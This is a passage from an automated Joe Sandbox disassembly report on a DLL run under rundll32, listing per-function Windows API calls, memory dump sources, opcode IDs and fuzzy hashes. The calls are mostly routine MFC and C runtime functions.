                                                                                                                                                            • Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                                                            • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                                                            • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                                                            • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                                                            • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                                                            • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 670545878-0
                                                                                                                                                            • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                                                            • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                                                            • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                                                            • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                                                            • GetWindowRect.USER32 ref: 1002059C
                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1315500227-0
                                                                                                                                                            • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                                                            • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                                                            • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                                                            • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _memset
                                                                                                                                                            • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                                                            • API String ID: 2102423945-4122032997
                                                                                                                                                            • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                                                            • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                                                            • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                                                            • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                                            • String ID: System
                                                                                                                                                            • API String ID: 1529587224-3470857405
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                                                            • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                                                            • API String ID: 2418878492-2500072749
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                                                            • _memset.LIBCMT ref: 1001579D
                                                                                                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                                                            • LoadBitmapA.USER32 ref: 10015807
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4271682439-3916222277
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                                                            • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                                                            • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2429671754-3916222277
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: System$Metrics$InfoParameters
                                                                                                                                                            • String ID: B$DISPLAY
                                                                                                                                                            • API String ID: 3136151823-3316187204
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Edit
                                                                                                                                                            • API String ID: 0-554135844
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                                                            • SendMessageA.USER32 ref: 10023CD9
                                                                                                                                                            • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                                                            • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                                                            • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 187318432-0
                                                                                                                                                            • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                                            • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                                                            • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                                            • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                                                              • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 69039007-0
                                                                                                                                                            • Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                                            • Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
                                                                                                                                                            • Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                                            • Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                                                              • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                                                              • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                                                            • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                                                            • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CapsDevice$Mode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 696222070-0
                                                                                                                                                            • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                                            • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                                                            • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                                            • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                                                              • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                                                              • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                                                            • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                                                            • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CapsDevice$Mode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 696222070-0
                                                                                                                                                            • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                                                            • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                                                            • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                                                            • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                                                            • _memset.LIBCMT ref: 10020424
                                                                                                                                                            • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 289641511-0
                                                                                                                                                            • Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                                                            • Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
                                                                                                                                                            • Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                                                            • Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                                                              • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                                                              • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                                                              • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                                                              • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                                                            • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                                                              • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                                                            • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                                                            • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2731880238-0
                                                                                                                                                            • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                                            • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                                                            • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                                            • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                                                            • SetWindowLongA.USER32 ref: 10012989
                                                                                                                                                              • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
